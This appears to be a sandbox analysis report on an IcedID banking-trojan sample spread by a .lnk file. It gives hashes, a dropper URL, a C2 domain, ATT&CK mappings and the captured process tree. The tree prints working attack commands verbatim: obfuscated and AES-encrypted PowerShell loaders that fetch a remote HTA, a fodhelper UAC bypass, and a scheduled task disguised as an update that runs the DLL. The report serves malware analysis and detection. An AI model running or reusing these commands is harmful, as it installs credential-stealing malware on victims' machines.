icedid | c88f8fe20ad9910200377a94c939be0bbfa16889b5418dfca1fe0fb4fd03973c

General

Target

54267-876-8676.lnk
Size

2KB
MD5

9edabe11d846a6de5d337e737d24e85c
SHA1

26f63aac40c4e9f459a379eec94a258b604f582e
SHA256

4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023
SHA512

5e88d418cb26f4bfd7bf5d1b2dbf31a8f026bbf29c760919d2986c883de6067df75c5eb8ca790a2c4a7ef09b87a2c6ba1b62e57e76fc3b32af633317639c6f0e

Score

10^/10

icedid 109932505 banker loader trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://modhub.com.br/upload.hta

Extracted

Family

icedid

Campaign

109932505

C2

ilekvoyn.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

3420 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3420 powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
3420	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3420	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1956 wrote to memory of 3420	1956	cmd.exe	powershell.exe
PID 1956 wrote to memory of 3420	1956	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\54267-876-8676.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta
3⤵
PID:2884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $UGJgEhmuQd = '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';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF)
4⤵
PID:4588

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
5⤵
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" "
6⤵
PID:4960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe function lXaTHPIMgDeIVvlfqHA ($nARswVhMRcfL){ $SfuFUBdulKOIhfkjXUL = 'Core update check'; $yIeGITfeyZCr = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $SfuFUBdulKOIhfkjXUL; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @yIeGITfeyZCr -Force}; lXaTHPIMgDeIVvlfqHA C:\Users\Admin\AppData\Local\Temp\0397ase.dll
1⤵
PID:3988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat" *
1⤵
PID:3468

C:\Windows\system32\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\lxpwR.bat"
2⤵
PID:1164

C:\Windows\system32\Rundll32.exe
Rundll32.exe C:\Users\Admin\AppData\Local\Temp\0397ase.dll,DllRegisterServer
1⤵
PID:3840

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8b591dabf3d165412ca5160b0fc9f7a0

SHA1
7f4003f64d280a98099a799b7303ab94adfea747

SHA256
d90968baa89063686e83e4514b0b0341f703aefec3e00f63020a344763e92f60

SHA512
57aaed079e38c08f0fe05aec21c02c84a7ed80780e796a5944227d5f17439a1b4378004931512965445826457f30488ec8f173b199e0e5374d4828c43a7e8af5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
360B

MD5
64e1f4dd0f30a9dd1aad27c30c69dcfc

SHA1
ddc6d7411bfe8273612f25371b06ba6eb54192b8

SHA256
16cb1f0cdece0b42cdbe4fe7ab8382ea9161d8d726d9c2a00d2dc57d7b03306e

SHA512
4ab438316b5e1b3539220eefca94fbfc411e17aac0f60fae18110e493d5fc7dd5cba5ed9f636649dd9b3ec0736a88cc291926905651a5ef796c7e3469c142c89

Download Submit
C:\Users\Admin\AppData\Local\Temp\0397ase.dll

Filesize
702KB

MD5
9b692f43d575acb739decfc809db7f2e

SHA1
bc42c60590cb908e765e2d97e8b3a92b4616cd30

SHA256
0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7

SHA512
f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473

Download Submit
C:\Users\Admin\AppData\Local\Temp\0397ase.dll

Filesize
425KB

MD5
617dc15078de9604ba994a140f29d2a6

SHA1
004d4e79d99b99d106406cc89ca437daa5badf4a

SHA256
7a24a7ba60b8d1942b8bb2b95bb75d31a2b29404b9b7c9bd1865f32b3fa438c0

SHA512
c52eba34ece6e2b68d3f61ca8f3af3520409c354ad7abc84fd02cb6b5c2ad028f635db6583b378eeade91fd6b1e46c2f487fbaa712f8ef4b5b99b1dacc951138

Download Submit
C:\Users\Admin\AppData\Local\Temp\lxpwR.bat

Filesize
714B

MD5
c89f63062141bea640be6864ba85f57f

SHA1
dce355e580893996f4df0753785f975fb7801d7e

SHA256
28770f2c402d52622b2a1ce5ee07aeb75071196a3699054af780766b6a3b1125

SHA512
773ec4a25afc690f2be3816544fe7718631c28be5d53c3b255b3466db270338f01829d1bd841536ef59d5f973e0eaf3e8a20fa8f22da9c137a295761d5da862b

Download Submit
memory/1164-146-0x0000000000000000-mapping.dmp

Download
memory/2884-132-0x0000000000000000-mapping.dmp

Download
memory/3420-134-0x00007FFBA4980000-0x00007FFBA5441000-memory.dmp

Filesize
10.8MB

Download
memory/3420-130-0x0000000000000000-mapping.dmp

Download
memory/3420-131-0x0000013483640000-0x0000013483662000-memory.dmp

Filesize
136KB

Download
memory/3468-142-0x0000000000000000-mapping.dmp

Download
memory/3840-149-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/3988-143-0x0000000000000000-mapping.dmp

Download
memory/3988-144-0x00007FFBA3E20000-0x00007FFBA48E1000-memory.dmp

Filesize
10.8MB

Download
memory/4468-139-0x0000000000000000-mapping.dmp

Download
memory/4588-138-0x00007FFBA3E20000-0x00007FFBA48E1000-memory.dmp

Filesize
10.8MB

Download
memory/4588-135-0x0000000000000000-mapping.dmp

Download
memory/4960-140-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads